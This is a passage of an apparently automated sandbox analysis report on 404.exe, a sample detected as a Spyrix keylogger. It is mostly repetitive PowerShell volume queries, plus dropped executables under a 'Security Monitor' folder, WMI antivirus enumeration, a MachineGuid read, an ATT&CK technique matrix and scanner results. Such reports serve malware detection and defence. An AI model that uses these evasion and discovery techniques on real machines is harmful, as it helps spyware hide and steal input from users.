Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033AD280 GetLocalTime,

51_2_033AD280

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033D05CC GetVersionExA,GetVersionExA,

51_2_033D05CC

Source: C:\Users\user\Desktop\404.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.3167683213.00000000018EC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_002452B0 setsockopt,_errno,_errno,_errno,strlen,memset,strncmp,strncmp,htons,WSAGetLastError,setsockopt,WSAIoctl,WSAGetLastError,strchr,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,WSAGetLastError,connect,htons,atoi,

65_2_002452B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	31 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	31 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	31 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	41 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	57 System Information Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	51 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	51 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
404.exe	76%	ReversingLabs	ByteCode-MSIL.Keylogger.Spyrix
404.exe	75%	Virustotal		Browse
404.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	0%	ReversingLabs
